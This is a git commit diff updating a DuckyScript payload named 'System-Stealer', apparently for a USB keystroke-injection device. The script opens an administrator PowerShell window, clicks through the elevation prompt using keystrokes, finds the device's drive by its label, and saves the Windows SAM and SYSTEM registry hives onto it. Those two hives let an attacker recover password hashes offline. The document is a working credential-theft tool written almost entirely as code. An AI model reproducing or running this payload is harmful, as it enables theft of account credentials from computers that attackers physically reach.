Merge 61eb88ab6c into 675972662a

Update payload.txt
2024-10-22 14:42:24 -04:00 · 2024-10-22 14:41:32 -04:00
1 changed files with 10 additions and 6 deletions
--- a/payloads/library/exfiltration/System-Stealer/payload.txt
+++ b/payloads/library/exfiltration/System-Stealer/payload.txt
@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT
        END_IF
    END_REM
 END_EXTENSION
+REM Change $DRIVELABEL to the storage label of your duck
+DEFINE #DRIVELABEL DUCKY
 IF ($_OS == WINDOWS) THEN
-    INJECT_MOD GUI R
+    GUI r
    DELAY 500
-    STRING cmd
+    STRING powershell
    DELAY 1000
    CTRL-SHIFT-ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 1000
-    REM Change $DRIVELABEL to the storage label of your duck
-    DEFINE #DRIVELABEL D:
-    STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save
+    STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
+    DELAY 250
+    STRINGLN reg save HKLM\sam $DriveLetter/sam.save
    WAIT_FOR_STORAGE_ACTIVITY
    WAIT_FOR_STORAGE_INACTIVITY
-    STRINGLN reg save HKLM\system #DRIVELABEL/system.save
+    STRINGLN reg save HKLM\system $DriveLetter/system.save
    WAIT_FOR_STORAGE_ACTIVITY
    WAIT_FOR_STORAGE_INACTIVITY
+    ALT F4
 ELSE
+    ATTACKMODE OFF
    STOP_PAYLOAD
 END_IF
Author	SHA1	Message	Date
Mavis Coffey	5036fd1b9f	Merge `61eb88ab6c` into `675972662a`	2024-10-22 14:42:24 -04:00
Mavis Coffey	61eb88ab6c	Update payload.txt	2024-10-22 14:41:32 -04:00